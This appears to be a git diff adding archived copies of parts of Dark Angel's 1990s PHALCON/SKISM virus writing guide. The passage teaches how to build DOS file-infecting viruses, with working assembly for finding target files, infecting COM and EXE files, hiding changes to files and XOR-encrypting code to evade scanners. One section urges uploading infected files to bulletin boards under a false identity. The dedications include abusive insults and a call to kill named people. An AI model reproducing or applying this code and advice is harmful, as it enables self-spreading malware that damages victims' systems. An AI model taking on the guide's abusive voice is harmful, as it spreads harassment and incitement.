+file, the  locations of  variables change.  You MUST account for this.  All
+relative offsets  can stay  the same, but you must add the file size to the
+absolute offsets  or your  program will  not work.  This is the most tricky
+part of  writing virii  and taking  these into  account can  often  greatly
+increase the  size of  a virus.   THIS  IS VERY IMPORTANT AND YOU SHOULD BE
+SURE TO  UNDERSTAND THIS BEFORE ATTEMPTING TO WRITE A NONOVERWRITING VIRUS!
+If you  don't, you'll  get fucked  over and  your virus WILL NOT WORK!  One
+entire part of the guide will be devoted to this subject.
+
+-=-=-=-
+TESTING
+-=-=-=-
+Testing virii  is a  dangerous yet  essential part  of the  virus  creation
+process.   This is  to make  certain that people *will* be hit by the virus
+and, hopefully,  wiped out.   Test  thoroughly and  make sure  it activates
+under the  conditions.  It would be great if everyone had a second computer
+to test  their virii  out, but,  of course, this is not the case.  So it is
+ESSENTIAL that  you keep BACKUPS of your files, partition, boot record, and
+FAT.   Norton is  handy in  this doing  this.  Do NOT disregard this advice
+(even though  I know  that you will anyway) because you WILL be hit by your
+own virii.   When  I wrote my first virus, my system was taken down for two
+days because I didn't have good backups.  Luckily, the virus was not overly
+destructive.   BACKUPS MAKE  SENSE!  LEECH A BACKUP PROGRAM FROM YOUR LOCAL
+PIRATE BOARD!   I find a RamDrive is often helpful in testing virii, as the
+damage is  not permanent.   RamDrives  are also useful for testing trojans,
+but that is the topic of another file...
+
+-=-=-=-=-=-=-
+DISTRIBUTION
+-=-=-=-=-=-=-
+This is  another fun  part of  virus writing.   It  involves  sending  your
+brilliantly-written  program   through  the  phone  lines  to  your  local,
+unsuspecting bulletin  boards.   What you  should do  is infect a file that
+actually does something (leech a useful utility from another board), infect
+it, and upload it to a place where it will be downloaded by users all over.
+The best  thing is  that it  won't be detected by puny scanner-wanna-bes by
+McAffee, since it is new!  Oh yeah, make sure you are using a false account
+(duh).   Better yet,  make a  false account  with the  name/phone number of
+someone you  don't like  and upload  the infected  file under the his name.
+You can  call back  from time to time and use a door such as ZDoor to check
+the spread  of the virus.  The more who download, the more who share in the
+experience of your virus!
+
+I promised a brief section on overwriting virii, so here it is...
+-=-=-=-=-=-=-=-=-
+OVERWRITING VIRII
+-=-=-=-=-=-=-=-=-
+All these  virii do  is spread  throughout the  system.   They  render  the
+infected files  inexecutable, so they are easily detected.  It is simple to
+write one:
+
+   +-------------+   +-----+   +-------------+
+   | Program     | + |Virus| = |Virus|am     |
+   +-------------+   +-----+   +-------------+
+
+These virii are simple little hacks, but pretty worthless because of their
+easy detectability.  Enuff said!
+
+-=-=-=-=-=-=-=-=-=-=-=-=-
+WELL, THAT JUST ABOUT...
+-=-=-=-=-=-=-=-=-=-=-=-=-
+wraps it  up for  this installment  of Dark  Angel's Phunky  virus  writing
+guide.   There will (hopefully) be future issues where I discuss more about
+virii and  include much  more source  code (mo' source!).  Till then, happy
+coding!
+
+
+
+
\ No newline at end of file
diff --git a/textfiles.com/virus/ps-vir2.txt b/textfiles.com/virus/ps-vir2.txt
new file mode 100644
index 00000000..7c7c98b1
--- /dev/null
+++ b/textfiles.com/virus/ps-vir2.txt
@@ -0,0 +1,594 @@
+      //==//  //  //  /||      //      //====  //==//  //|   //
+     //  //  //  //  //||     //      //      //  //  //||  //
+    //==//  //==//  //=||    //      //      //  //  // || //
+   //      //  //  //  ||   //      //      //  //  //  ||//
+  //      //  //  //   ||  //====  //====  //==//  //   ||/
+  
+     /====   // //     //  /====   /|   /|
+    //      // //     //  //      //|  //|
+    ===\   // //     //   ===\   //|| //||
+      //  //  \\    //      //  // ||// ||
+  ====/  //    \\  //   ====/  //  ||/  ||
+  
+  ����������������������������������������������
+  DISCLAIMER: Pretend you see a disclaimer here.
+    99.44% of the code guaranteed to work.
+  ����������������������������������������������
+  DEDICATION: Please try your best to kill those
+    who made this possible, especially that dumb
+    bitch who doesn't know her own name (Patty),
+    and her lover Ross M. Greenberg.
+  ����������������������������������������������
+  GREETS -N- STUFF: Greets go to all the members
+    of PHALCON/SKISM.  I wish to give buckets o'
+    thanks to Hellraiser, Garbageheap, and Demo-
+    gorgon.  No thanks this time to Orion Rouge,
+    the godly master of idiocy.
+  ����������������������������������������������
+  
+  Dark Angel's Chunky Virus Writing Guide
+  ���� ������� ������ ����� ������� �����
+  
+  �������������������������������
+  INSTALLMENT II:  THE REPLICATOR
+  �������������������������������
+  
+  In the  last installment of my Virus Writing Guide, I explained the various
+  parts of  a virus  and went  into a  brief discussion  about each.  In this
+  issue, I  shall devote  all my  attention towards the replicator portion of
+  the virus.  I promised code and code I shall present.
+  
+  However, I  shall digress  for a moment because it has come to my attention
+  that some  mutant  copies  of  the  first  installment  were  inadvertently
+  released.   These copies  did not  contain a  vital section  concerning the
+  calculation of offsets.
+  
+  You never  know where  your variables  and code  are going  to wind  up  in
+  memory.   If you think a bit, this should be pretty obvious.  Since you are
+  attaching the  virus to  the end  of a  program, the  location in memory is
+  going to  be changed,  i.e. it  will be  larger by the size of the infected
+  program.   So, to  compensate, we  must take  the change in offset from the
+  original virus,  or the  delta offset,  and add  that to  all references to
+  variables.
+  
+  Instructions that  use displacement,  i.e. relative  offsets, need  not  be
+  changed.   These instructions are the JA, JB, JZ class of instructions, JMP
+  SHORT, JMP label, and CALL.  Thus, whenever possible use these in favor of,
+  say, JMP FAR PTR.
+  
+  Suppose in  the following  examples, si  is somehow  loaded with  the delta
+  offset.
+  
+  Replace
+    mov ax, counter
+  With
+    mov ax, word ptr [si+offset counter]
+  
+  Replace
+    mov dx, offset message
+  With
+    lea dx, [si+offset message]
+  
+  You may  be asking, "how the farg am I supposed to find the delta offset!?"
+  It is simple enough:
+  
+    call setup
+  setup:
+    pop  si
+    sub  si, offset setup
+  
+  An explanation  of the  above fragment  is in order.  CALL setup pushes the
+  location of the next instruction, i.e. offset setup, onto the stack.  Next,
+  this location  is POPed  into si.   Finally,  the ORIGINAL  offset of setup
+  (calculated at  compile-time) is  subtracted from  si, giving you the delta
+  offset.   In the  original virus,  the delta offset will be 0, i.e. the new
+  location of setup equals the old location of setup.
+  
+  It is  often preferable to use bp as your delta offset, since si is used in
+  string instructions.  Use whichever you like.  I'll randomly switch between
+  the two as suits my mood.
+  
+  Now back to the other stuff...
+  
+  A biological  virus is a parasitic "organism" which uses its host to spread
+  itself.   It must keep the host alive to keep itself "alive."  Only when it
+  has spread  everywhere will  the host  die a  painful, horrible death.  The
+  modern electronic  virus is  no different.   It  attaches itself  to a host
+  system and  reproduces until the entire system is fucked.  It then proceeds
+  and neatly wrecks the system of the dimwit who caught the virus.
+  
+  Replication is  what distinguishes  a virus  from a simple trojan.  Anybody
+  can write  a trojan,  but a  virus is  much more  elegant.   It acts almost
+  invisibly, and  catches the victim off-guard when it finally surfaces.  The
+  first question  is, of  course, how  does a virus spread?  Both COM and EXE
+  infections (along with sample infection routines) shall be presented.
+  
+  There are  two major  approaches to  virii: runtime and TSR.  Runtime virii
+  infect, yup,  you guessed  it, when  the infected program is run, while TSR
+  virii go  resident  when  the  infected  programs  are  run  and  hook  the
+  interrupts and  infect when  a file  is  run,  open,  closed,  and/or  upon
+  termination (i.e.  INT  20h,  INT  21h/41h).    There  are  advantages  and
+  disadvantages to  each.   Runtime virii  are harder to detect as they don't
+  show up on memory maps, but, on the other hand, the delay while it searches
+  for and  infects a file may give it away.  TSR virii, if not properly done,
+  can be  easily spotted  by utilities such as MAPMEM, PMAP, etc, but are, in
+  general, smaller  since they  don't need  a function to search for files to
+  infect.   They are  also faster than runtime virii, also because they don't
+  have to  search for files to infect.  I shall cover runtime virii here, and
+  TSR virii in a later installment.
+  
+  Here is a summary of the infection procedure:
+       1) Find a file to infect.
+       2) Check if it meets the infection criteria.
+       3) See if it is already infected and if so, go back to 1.
+       4) Otherwise, infect the file.
+       5) Cover your tracks.
+  
+  I shall  go through  each of  these steps and present sample code for each.
+  Note that  although a  complete virus  can be  built from  the  information
+  below, you  cannot merely  rip the  code out  and stick it together, as the
+  fragments are  from various  different virii that I have written.  You must
+  be somewhat  familiar with assembly.  I present code fragments; it is up to
+  you to either use them as examples or modify them for your own virii.
+  
+  ������������������������������
+  STEP 1 - FIND A FILE TO INFECT
+  ������������������������������
+  Before you  can infect  a file,  you have  to find it first!  This can be a
+  bottleneck in  the performance  of the  virus, so  it  should  be  done  as
+  efficiently as possible.  For runtime virii, there are a few possibilities.
+  You could  infect files in only the current directory, or you could write a
+  directory traversal function to infect files in ALL directories (only a few
+  files per  run, of  course), or you could infect files in only a few select
+  directories.   Why would  you choose  to only  infect files  in the current
+  directory?   It would  appear to  limit the  efficacy  of  the  infections.
+  However, this  is done  in some  virii either  to speed  up the virus or to
+  shorten the code size.
+  
+  Here is a directory traversal function.  It uses recursion, so it is rather
+  slow, but it does the job.  This was excerpted with some modifications from
+  The Funky Bob Ross Virus [Beta].
+  
+  traverse_fcn proc    near
+          push    bp                      ; Create stack frame
+          mov     bp,sp
+          sub     sp,44                   ; Allocate space for DTA
+  
+          call    infect_directory        ; Go to search & destroy routines
+  
+          mov     ah,1Ah                  ;Set DTA
+          lea     dx,word ptr [bp-44]     ; to space allotted
+          int     21h                     ;Do it now!
+  
+          mov     ah, 4Eh                 ;Find first
+          mov     cx,16                   ;Directory mask
+          lea     dx,[si+offset dir_mask] ; *.*
+          int     21h
+          jmp     short isdirok
+  gonow:
+          cmp     byte ptr [bp-14], '.'   ; Is first char == '.'?
+          je      short donext            ; If so, loop again
+          lea     dx,word ptr [bp-14]     ; else load dirname
+          mov     ah,3Bh                  ; and changedir there
+          int     21h
+          jc      short donext              ; Do next if invalid
+          inc     word ptr [si+offset nest] ; nest++
+          call    near ptr traverse_fcn     ; recurse directory
+  donext:
+          lea     dx,word ptr [bp-44]     ; Load space allocated for DTA
+          mov     ah,1Ah                  ; and set DTA to this new area
+          int     21h                     ; 'cause it might have changed
+  
+          mov     ah,4Fh                  ;Find next
+          int     21h
+  isdirok:
+          jnc     gonow                   ; If OK, jmp elsewhere
+          cmp     word ptr [si+offset nest], 0 ; If root directory
+                                               ;  (nest == 0)
+          jle     short cleanup                ; then Quit
+          dec     word ptr [si+offset nest]    ; Else decrement nest
+          lea     dx, [si+offset back_dir]; '..'
+          mov     ah,3Bh                  ; Change directory
+          int     21h                     ; to previous one
+  cleanup:
+          mov     sp,bp
+          pop     bp
+          ret
+  traverse_fcn endp
+  
+  ; Variables
+  nest     dw     0
+  back_dir db     '..',0
+  dir_mask db     '*.*',0
+  
+  The code  is self-explanatory.   Make  sure  you  have  a  function  called
+  infect_directory which scans the directory for possible files to infect and
+  makes sure  it doesn't  infect already-infected  files.   This function, in
+  turn, calls infect_file which infects the file.
+  
+  Note, as  I said  before, this  is slow.   A  quicker method, albeit not as
+  global, is  the "dot  dot" method.   Hellraiser  showed me this neat little
+  trick.   Basically, you  keep searching  each directory and, if you haven't
+  infected enough,  go to the previous directory (dot dot) and try again, and
+  so on.  The code is simple.
+  
+  dir_loopy:
+          call    infect_directory
+          lea     dx, [bp+dotdot]
+          mov     ah, 3bh                 ; CHDIR
+          int     21h
+          jnc     dir_loopy               ; Carry set if in root
+  
+  ; Variables
+  dotdot  db      '..',0
+  
+  Now you  must find a file to infect.  This is done (in the fragments above)
+  by a  function called infect_directory.  This function  calls FINDFIRST and
+  FINDNEXT a  couple of  times to find files to infect.  You should first set
+  up a  new DTA.  NEVER use the DTA in the PSP (at 80h) because altering that
+  will affect  the command-line  parameters  of  the  infected  program  when
+  control is returned to it.  This is easily done with the following:
+  
+          mov     ah, 1Ah                 ; Set DTA
+          lea     dx, [bp+offset DTA]     ; to variable called DTA (wow!)
+          int     21h
+  
+  Where DTA  is a 42-byte chunk of memory.  Next, issue a series of FINDFIRST
+  and FINDNEXT calls:
+  
+          mov     ah, 4Eh                 ; Find first file
+          mov     cx, 0007h               ; Any file attribute
+          lea    dx, [bp+offset file_mask]; DS:[DX] --> filemask
+          int     21h
+          jc      none_found
+  found_another:
+          call    check_infection
+          mov     ah, 4Fh                 ; Find next file
+          int     21h
+          jnc     found_another
+  none_found:
+  
+  Where file_mask  is DBed  to either '*.EXE',0 or '*.COM',0.  Alternatively,
+  you could FINDFIRST for '*.*',0 and check if the extension is EXE or COM.
+  
+  ����������������������������������������
+  STEP 2 - CHECK VERSUS INFECTION CRITERIA
+  ����������������������������������������
+  Your virus  should be  judicious in  its infection.  For example, you might
+  not want  to  infect  COMMAND.COM,  since  some  programs  (i.e.  the  puny
+  FluShot+) check its CRC or checksum on runtime.  Perhaps you do not wish to
+  infect the  first valid file in the directory.  Ambulance Car is an example
+  of such  a virus.   Regardless,  if there  is some  infection criteria, you
+  should check  for it  now.   Here's example  code checking  if the last two
+  letters are 'ND', a simple check for COMMAND.COM:
+  
+          cmp     word ptr [bp+offset DTA+35], 'DN'  ; Reverse word order
+          jz      fail_check
+  
+  �������������������������������������
+  STEP 3 - CHECK FOR PREVIOUS INFECTION
+  �������������������������������������
+  Every virus has certain characteristics with which you can identify whether
+  a file  is infected  already.   For example,  a certain  piece of  code may
+  always occur  in a  predictable place.   Or  perhaps the JMP instruction is
+  always coded  in the  same manner.   Regardless,  you should make sure your
+  virus has  a marker  so that  multiple infections  of the  same file do not
+  occur.  Here's an example of one such check (for a COM file infector):
+  
+          mov     ah,3Fh                          ; Read first three
+          mov     cx, 3                           ; bytes of the file
+          lea     dx, [bp+offset buffer]          ; to the buffer
+          int     21h
+  
+          mov     ax, 4202h                       ; SEEK from EOF
+          xor     cx, cx                          ; DX:CX = offset
+          xor     dx, dx                          ; Returns filesize
+          int     21h                             ; in DX:AX
+  
+          sub     ax, virus_size + 3
+          cmp     word ptr [bp+offset buffer+1], ax
+          jnz     infect_it
+  
+  bomb_out:
+          mov     ah, 3Eh                         ; else close the file
+          int     21h                             ;  and go find another
+  
+  In this  example, BX  is assumed to hold a file handle to the program to be
+  checked for  infection and virus_size equals the size of the virus.  Buffer
+  is assumed  to be  a three-byte  area of  empty space.   This code fragment
+  reads the  first three bytes into buffer and then compares the JMP location
+  (located in  the word  beginning at  buffer+1) to  the filesize  If the JMP
+  points to  virus_size bytes  before the  EOF,  then  the  file  is  already
+  infected with  this virus.   Another method would be to search at a certain
+  location in the file for a marker byte or word.  For example:
+  
+          mov     ah, 3Fh                         ; Read the first four
+          mov     cx, 4                           ; bytes of the file into
+          lea     dx, [bp+offset buffer]          ; the buffer.
+          int     21h
+  
+          cmp     byte ptr [buffer+3], infection_id_byte ; Check the fourth
+          jz      bomb_out                        ; byte for the marker
+  infect_it:
+  
+  ������������������������
+  STEP 4 - INFECT THE FILE
+  ������������������������
+  This is  the "guts"  of the  virus, the  heart of the replicator.  Once you
+  have located  a potential  file, you  must save the attributes, time, date,
+  and size for later use.  The following is a breakdown of the DTA:
+  
+    Offset     Size      What it is
+      0h       21 BYTES  Reserved, varies as per DOS version
+     15h       BYTE      File attribute
+     16h       WORD      File time
+     18h       WORD      File date
+     1Ah       DWORD     File size
+     1Eh       13 BYTES  ASCIIZ filename + extension
+  
+  As you can see, the DTA holds all the vital information about the file that
+  you need.  The following code fragment is a sample of how to save the info:
+  
+          lea  si, [bp+offset DTA+15h]            ; Start from attributes
+          mov  cx, 9                              ; Finish with size
+          lea  di, [bp+offset f_attr]             ; Move into your locations
+          rep  movsb
+  ; Variables needed
+  f_attr  db   ?
+  f_time  dw   ?
+  f_date  dw   ?
+  f_size  dd   ?
+  
+  You can  now change the file attributes to nothing through INT 21h/Function
+  43h/Subfunction 01h.   This  is to  allow infection  of system, hidden, and
+  read only  files.   Only primitive  (or minimal)  virii cannot  handle such
+  files.
+  
+          lea  dx, [bp+offset DTA+1eh]            ; DX points to filename in
+          mov  ax, 4301h                          ; DTA
+          xor  cx, cx                             ; Clear file attributes
+          int  21h                                ; Issue the call
+  
+  Once the  attributes have  been annihilated,  you may  open the  file  with
+  callous impunity.  Use a handle open in read/write mode.
+  
+          lea  dx, [bp+offset DTA+1eh]            ; Use filename in DTA
+          mov  ax, 3d02h                          ; Open read/write mode
+          int  21h                                ; duh.
+          xchg ax, bx                             ; Handle is more useful in
+                                                  ; BX
+  
+  Now we come to the part you've all been waiting for: the infection routine.
+  I am  pleased to present code which will handle the infection of COM files.
+  Yawn, you  say, I can already do that with the information presented in the
+  previous installment.   Ah,  but there  is more,  much more.   A sample EXE
+  infector shall also be presented shortly.
+  
+  The theory  behind COM  file infection was covered in the last installment,
+  so I shall not delve into the details again.  Here is a sample infector:
+  
+  ; Sample COM infector.  Assumes BX holds the file handle
+  ; Assume COM file passes infection criteria and not already infected
+          mov     ah, 3fh
+          lea     dx, [bp+buffer1]
+          mov     cx, 3
+          int     21h
+  
+          mov     ax, 4200h                       ; Move file pointer to
+          xor     cx, cx                          ; the beginning of the
+          xor     dx, dx                          ; file
+          int     21h
+  
+          mov     byte ptr [bp+buffer2], 0e9h      ; JMP
+          mov     ax, word ptr [bp+f_size]
+          sub     ax, part1_size                   ; Usually 3
+          mov     word ptr [bp+buffer2+1], ax      ; offset of JMP
+  
+  ; Encode JMP instruction to replace beginning of the file
+          mov     byte ptr [bp+buffer2], 0e9h      ; JMP
+          mov     ax, word ptr [bp+f_size]
+          sub     ax, part1_size                   ; Usually 3
+          mov     word ptr [bp+buffer2+1], ax      ; offset of JMP
+  
+  ; Write the JMP instruction to the beginning of the file
+          mov     ah, 40h                          ; Write CX bytes to
+          mov     cx, 3                            ; handle in BX from
+          lea     dx, [bp+buffer2]                 ; buffer -> DS:[DX]
+          int     21h
+  
+          mov     ax, 4202h                        ; Move file pointer to
+          xor     cx, cx                           ; end of file
+          xor     dx, dx
+          int     21h
+  
+          mov     ah, 40h                          ; Write CX bytes
+          mov     cx, endofvirus - startofpart2    ; Effective size of virus
+          lea     dx, [bp+startofpart2]            ; Begin write at start
+          int     21h
+  
+  ; Variables
+  buffer1 db 3 dup (?)                             ; Saved bytes from the
+                                                   ; infected file to restore
+                                                   ; later
+  buffer2 db 3 dup (?)                             ; Temp buffer
+  
+  After some  examination, this code will prove to be easy to understand.  It
+  starts by reading the first three bytes into a buffer.  Note that you could
+  have done  this in  an earlier  step, such  as when  you are checking for a
+  previous infection.   If  you have  already done  this, you obviously don't
+  need to  do it again.  This buffer must be stored in the virus so it can be
+  restored later when the code is executed.
+  
+  EXE infections  are also  simple, although  a  bit  harder  to  understand.
+  First, the thoery.  Here is the format of the EXE header:
+  
+   Ofs Name                Size      Comments
+   00  Signature           2 bytes   always 4Dh 5Ah (MZ)
+  *02  Last Page Size      1 word    number of bytes in last page
+  *04  File Pages          1 word    number of 512 byte pages
+   06  Reloc Items         1 word    number of entries in table
+   08  Header Paras        1 word    size of header in 16 byte paras
+   0A  MinAlloc            1 word    minimum memory required in paras
+   0C  MaxAlloc            1 word    maximum memory wanted in paras
+  *0E  PreReloc SS         1 word    offset in paras to stack segment
+  *10  Initial SP          1 word    starting SP value
+   12  Negative checksum   1 word    currently ignored
+  *14  Pre Reloc IP        1 word    execution start address
+  *16  Pre Reloc CS        1 word    preadjusted start segment
+   18  Reloc table offset  1 word    is offset from start of file)
+   1A  Overlay number      1 word    ignored if not overlay
+   1C  Reserved/unused     2 words
+  * denotes bytes which should be changed by the virus
+  
+  To understand  this, you  must first  realise that EXE files are structured
+  into segments.  These segments may begin and end anywhere.  All you have to
+  do to  infect an EXE file is tack on your code to the end.  It will then be
+  in its  own segment.  Now all you have to do is make the virus code execute
+  before the  program code.   Unlike  COM  infections,  no  program  code  is
+  overwritten, although  the header  is modified.   Note  the virus can still
+  have the  V1/V2 structure,  but only V2 needs to be concatenated to the end
+  of the infected EXE file.
+  
+  Offset 4  (File Pages)  holds the  size of the file divided by 512, rounded
+  up.   Offset 2 holds the size of the file modulo 512.  Offset 0Eh holds the
+  paragraph displacement  (relative to  the end of the header) of the initial
+  stack segment  and Offset 10h holds the displacement (relative to the start
+  of the  stack segment)  of the initial stack pointer.  Offset 16h holds the
+  paragraph displacement of the entry point relative to the end of the header
+  and offset  14h holds the displacement entry point relative to the start of
+  the entry  segment.   Offset 14h  and 16h are the key to adding the startup
+  code (the virus) to the file.
+  
+  Before you  infect the  file, you  should save the CS:IP and SS:SP found in
+  the EXE  header, as  you need  to restore  them upon  execution.  Note that
+  SS:SP is NOT stored in Intel reverse-double-word format.  If you don't know
+  what I'm  talking about, don't worry; it's only for very picky people.  You
+  should also save the file length as you will need to use that value several
+  times during  the infection  routine.   Now it's  time  to  calculate  some
+  offsets!   To find  the new  CS:IP and  SS:SP, use  the following code.  It
+  assumes the file size is loaded in DX:AX.
+  
+          mov     bx, word ptr [bp+ExeHead+8]    ; Header size in paragraphs
+               ;  ^---make sure you don't destroy the file handle
+          mov     cl, 4                          ; Multiply by 16.  Won't
+          shl     bx, cl                         ; work with headers > 4096
+                                                 ; bytes.  Oh well!
+          sub     ax, bx                         ; Subtract header size from
+          sbb     dx, 0                          ; file size
+    ; Now DX:AX is loaded with file size minus header size
+          mov     cx, 10h                        ; DX:AX/CX = AX Remainder DX
+          div     cx
+  
+  This code  is rather inefficient.  It would probably be easier to divide by
+  16 first  and then perform a straight subtraction from AX, but this happens
+  to be  the code  I chose.   Such is life. However, this code does have some
+  advantages over  the more  efficient one.   With this, you are certain that
+  the IP  (in DX)  will be under 15.  This allows the stack to be in the same
+  segment as the entry point, as long as the stack pointer is a large number.
+  
+  Now AX*16+DX  points to  the end  of code.  If the virus begins immediately
+  after the  end of the code, AX and DX can be used as the initial CS and IP,
+  respectively.   However, if  the virus  has some junk (code or data) before
+  the entry  point, add the entry point displacement to DX (no ADC with AX is
+  necessary since DX will always be small).
+  
+          mov     word ptr [bp+ExeHead+14h], dx  ; IP Offset
+          mov     word ptr [bp+ExeHead+16h], ax  ; CS Displacement in module
+  
+  The SP  and SS  can now  be calculated.   The  SS is  equal to the CS.  The
+  actual value  of the SP is irrelevant, as long as it is large enough so the
+  stack will  not overwrite code (remember: the stack grows downwards).  As a
+  general rule,  make sure the SP is at least 100 bytes larger than the virus
+  size.  This should be sufficient to avoid problems.
+  
+          mov     word ptr [bp+ExeHead+0Eh], ax  ; Paragraph disp. SS
+          mov     word ptr [bp+ExeHead+10h], 0A000h ; Starting SP
+  
+  All that  is left  to fiddle  in the  header is the file size.  Restore the
+  original file  size from  wherever you  saved it  to DX:AX.   To  calculate
+  DX:AX/512 and DX:AX MOD 512, use the following code:
+  
+          mov     cl, 9                           ; Use shifts again for
+          ror     dx, cl                          ; division
+          push    ax                              ; Need to use AX again
+          shr     ax, cl
+          adc     dx, ax                          ; pages in dx
+          pop     ax
+          and     ah, 1                           ; mod 512 in ax
+  
+          mov     word ptr [bp+ExeHead+4], dx     ; Fix-up the file size in
+          mov     word ptr [bp+ExeHead+2], ax     ; the EXE header.
+  
+  All that is left is writing back the EXE header and concatenating the virus
+  to the end of the file.  You want code?  You get code.
+  
+          mov     ah, 3fh                         ; BX holds handle
+          mov     cx, 18h                         ; Don't need entire header
+          lea     dx, [bp+ExeHead]
+          int     21h
+  
+          call    infectexe
+  
+          mov     ax, 4200h                       ; Rewind to beginning of
+          xor     cx, cx                          ; file
+          xor     dx, dx
+          int     21h
+  
+          mov     ah, 40h                         ; Write header back
+          mov     cx, 18h
+          lea     dx, [bp+ExeHead]
+          int     21h
+  
+          mov     ax, 4202h                       ; Go to end of file
+          xor     cx, cx
+          xor     dx, dx
+          int     21h
+  
+          mov     ah, 40h                         ; Note: Only need to write
+          mov     cx, part2size                   ;       part 2 of the virus
+          lea     dx, [bp+offset part2start]      ;      (Parts of virus
+          int     21h                             ;       defined in first
+                                                  ;       installment of
+                                                  ;       the guide)
+  
+  Note that this code alone is not sufficient to write a COM or EXE infector.
+  Code is also needed to transfer control back to the parent program.  The
+  information needed to do this shall be presented in the next installment.
+  In the meantime, you can try to figure it out on your own; just remember
+  that you must restore all that you changed.
+  
+  ��������������������������
+  STEP 5 - COVER YOUR TRACKS
+  ��������������������������
+  This step,  though simple  to do, is too easily neglected.  It is extremely
+  important, as a wary user will be alerted to the presence of a virus by any
+  unnecessary updates  to a  file.   In its  simplest form,  it involves  the
+  restoration of   file  attributes, time  and date.   This  is done with the
+  following:
+  
+          mov     ax, 5701h                      ; Set file time/date
+          mov     dx, word ptr [bp+f_date]       ; DX = date
+          mov     cx, word ptr [bp+f_time]       ; CX = time
+          int     21h
+  
+          mov     ah, 3eh                        ; Handle close file
+          int     21h
+  
+          mov     ax, 4301h                      ; Set attributes
+          lea     dx, [bp+offset DTA + 1Eh]      ; Filename still in DTA
+          xor     ch, ch
+          mov     cl, byte ptr [bp+f_attrib]     ; Attribute in CX
+          int     21h
+  
+  Remember also to restore the directory back to the original one if it
+  changed during the run of the virus.
+  
+  ��������������
+  WHAT'S TO COME
+  ��������������
+  I have been pleased with the tremendous response to the last installment of
+  the guide.   Next  time, I  shall cover  the rest  of the  virus as well as
+  various tips  and common tricks helpful in writing virii.  Until then, make
+  sure you  look for  40Hex, the  official PHALCON/SKISM  magazine, where  we
+  share tips and information pertinent to the virus community.
+  
diff --git a/textfiles.com/virus/ps-vir3.txt b/textfiles.com/virus/ps-vir3.txt
new file mode 100644
index 00000000..28a9c180
--- /dev/null
+++ b/textfiles.com/virus/ps-vir3.txt
@@ -0,0 +1,442 @@
+      //==//  //  //  /||      //      //====  //==//  //|   //
+     //  //  //  //  //||     //      //      //  //  //||  //
+    //==//  //==//  //=||    //      //      //  //  // || //
+   //      //  //  //  ||   //      //      //  //  //  ||//
+  //      //  //  //   ||  //====  //====  //==//  //   ||/
+  
+     /====   // //     //  /====   /|   /|
+    //      // //     //  //      //|  //|
+    ===\   // //     //   ===\   //|| //||
+      //  //  \\    //      //  // ||// ||
+  ====/  //    \\  //   ====/  //  ||/  ||
+  
+  �����������������������������������������������
+  DISCLAIMER: I hereby claim to have written this
+    file.
+  �����������������������������������������������
+  DEDICATION: This is dedicated to Patty Hoffman,
+    that fat bitch who doesn't know her own name,
+    and to the millions of dumb fools who were so
+    scared by Michelangelo that they didn't touch
+    their computers for an entire day.
+  �����������������������������������������������
+  GREETS: to all PHALCON/SKISM members especially
+    Garbageheap, Hellraiser, and Demogorgon.
+  �����������������������������������������������
+  
+  Dark Angel's Crunchy Virus Writing Guide
+  ���� ������� ������� ����� ������� �����
+       "It's the right thing to do"
+  
+  ��������������������������������������������
+  INSTALLMENT III:  NONRESIDENT VIRII, PART II
+  ��������������������������������������������
+  
+  Welcome to  the third  installment of  my Virus  Writing  Guide.    In  the
+  previous installment,  I covered  the primary  part  of  the  virus  -  the
+  replicator.   As promised,  I shall  now cover  the rest of the nonresident
+  virus and  present code  which, when  combined with  code from the previous
+  installment, will  be sufficient  to allow  anyone to write a simple virus.
+  Additionally, I  will present  a few  easy tricks  and tips  which can help
+  optimise your code.
+  
+  �������������
+  THE CONCEALER
+  �������������
+  The concealer  is the  most common  defense  virus  writers  use  to  avoid
+  detection of  virii.   The most common encryption/decryption routine by far
+  is the XOR, since it may be used for both encryption and decryption.
+  
+  encrypt_val   dw   ?   ; Should be somewhere in decrypted area
+  
+  decrypt:
+  encrypt:
+       mov dx, word ptr [bp+encrypt_val]
+       mov cx, (part_to_encrypt_end - part_to_encrypt_start + 1) / 2
+       lea si, [bp+part_to_encrypt_start]
+       mov di, si
+  
+  xor_loop:
+       lodsw
+       xor ax, dx
+       stosw
+       loop xor_loop
+  
+  The previous  routine uses  a simple XOR routine to encrypt or decrypt code
+  in memory.   This  is essentially  the same routine as the one in the first
+  installment, except  it encrypts words rather than bytes.  It therefore has
+  65,535 mutations  as opposed  to 255 and is also twice as fast.  While this
+  routine is  simple to  understand, it  leaves much  to be  desired as it is
+  large and therefore is almost begging to be a scan string.  A better method
+  follows:
+  
+  encrypt_val   dw    ?
+  
+  decrypt:
+  encrypt:
+       mov dx, word ptr [bp+encrypt_val]
+       lea bx, [bp+part_to_encrypt_start]
+       mov cx, (part_to_encrypt_end - part_to_encrypt_start + 1) / 2
+  
+  xor_loop:
+       xor word ptr [bx], dx
+       add bx, 2
+       loop xor_loop
+  
+  Although this  code is  much shorter,  it is possible to further reduce its
+  size.   The best  method is  to insert the values for the encryption value,
+  BX, and CX, in at infection-time.
+  
+  decrypt:
+  encrypt:
+       mov bx, 0FFFFh
+       mov cx, 0FFFFh
+  
+  xor_loop:
+       xor word ptr [bx], 0FFFFh
+       add bx, 2
+       loop xor_loop
+  
+  All the  values denoted  by 0FFFFh  may be changed upon infection to values
+  appropriate for  the infected  file.  For example, BX should be loaded with
+  the offset  of part_to_encrypt_start  relative to the start of the infected
+  file when the encryption routine is written to the infected file.
+  
+  The primary  advantage of  the code  used above is the minimisation of scan
+  code length.   The scan code can only consist of those portions of the code
+  which remain  constant.   In this  case,  there  are  only  three  or  four
+  consecutive bytes  which remain  constant.   Since  the  entire  encryption
+  consist of only about a dozen bytes, the size of the scan code is extremely
+  tiny.
+  
+  Although the  function of  the encryption  routine is  clear,  perhaps  the
+  initial encryption  value and  calculation of  subsequent values  is not as
+  lucid.  The initial value for most XOR encryptions should be 0.  You should
+  change the  encryption value  during  the  infection  process.    A  random
+  encryption value  is desired.   The  simplest method  of obtaining a random
+  number is  to consult  to internal  clock.   A random  number may be easily
+  obtained with a simple:
+  
+          mov     ah, 2Ch                         ; Get me a random number.
+          int     21h
+          mov     word ptr [bp+encrypt_val], dx   ; Can also use CX
+  
+  Some encryption  functions do not facilitate an initial value of 0.  For an
+  example, take  a look  at Whale.  It uses the value of the previous word as
+  an encryption  value.   In these  cases, simply  use a JMP to skip past the
+  decryption routine  when coding  the virus.   However, make sure infections
+  JMP to  the right location!  For example, this is how you would code such a
+  virus:
+  
+          org     100h
+  
+  start:
+          jmp     past_encryption
+  
+  ; Insert your encryption routine here
+  
+  past_encryption:
+  
+  The encryption  routine is  the ONLY  part of  the virus  which needs to be
